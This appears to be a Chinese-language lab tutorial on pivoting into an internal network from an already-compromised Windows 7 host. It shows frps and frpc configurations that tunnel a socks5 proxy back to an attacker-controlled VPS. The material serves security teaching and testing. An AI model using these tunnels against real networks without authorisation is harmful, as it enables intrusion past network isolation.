前言#

內網穿透，代理技術的聯系與區別？

我個人感覺在內網滲透的時候它們之間的界限很模糊，其目的都是為了突破內網訪問的限制。內網穿透允許將內網的服務暴露給公網，代理服務器充當客戶端和目標服務器之間的中介，通過代理服務器來轉發網絡請求和響應。

環境搭建#

攻擊機可以訪問web服務器win7并且已經獲取權限拿到shell，但是win7通過雙網卡將內網和外網隔離，所以攻擊機不可以直接訪問內網的Windows 2008主機。

目標：

通過vps搭建frps服務端
win7作為跳板機運行frpc客戶端將內網轉發到vps上
vps反向代理
通過vps的socks代理訪問內網

frp反向代理#

疑問：既然拿到了服務器的shell，為什么不拿服務器的shell直接入侵內網？

我的理解，其一是webshell的功能較少，通常是作為一個上傳工具的通道。其二是webshell通常是通過采用http協議傳輸，沒有建立穩定的tcp連接，難以應對內網的滲透時復雜的網絡要求。

所以就需要使用一下專業的內網滲透工具來保證內網滲透的過程中始終保持一個較好的網絡狀態。

frp就是這一個非常實用的工具，frp是一個專注于內網穿透的高性能的反向代理應用，支持TCP、UDP、HTTP、HTTPS等多種協議，且支持P2P通信。可以將內網服務以安全、便捷的方式通過具有公網IP節點的中轉暴露到公網。

frp項目地址：https://github.com/fatedier/frp

首先分別準備linux平臺和windows平臺的frp工具（版本需要保持一致）：

將liunx平臺frp上傳至liunx vps搭建frps服務端，需要用到的文件有兩個frps服務端程序和frps.ini服務端配置文件，需要重點關注frps.ini文件：

默認只有服務端綁定的端口，可以添加其他配置項目：

[common]
bind_addr = 0.0.0.0  #服務端的ip地址
bind_port = 7000  #服務端的端口號


dashboard_port = 7500  #服務端儀表盤界面的訪問端口
dashboard_user = admin  #儀表盤的用戶名
dashboard_pwd = 123456  #儀表盤的用戶密碼

保存配置文件，執行./frps -c ./frps.ini命令啟動frp服務端，等待客戶端連接：

服務搭建成功，接下來將windows平臺的frpc通過webshell上傳至服務器win7，同樣需要配置frpc.ini文件：

配置socks5代理：

[common]
server_addr = ip  #服務器的地址
server_port = 7000  #服務器監聽的端口號
tls_enable = ture  #啟用tls加密連接


[plugin socks]
type = tcp  #指定協議類型為tcp
plugin = socks5  #使用的插件為socks5
remote_port = 46075  #指定socks5代理的遠程端口
use_encryption = true
use_compression = true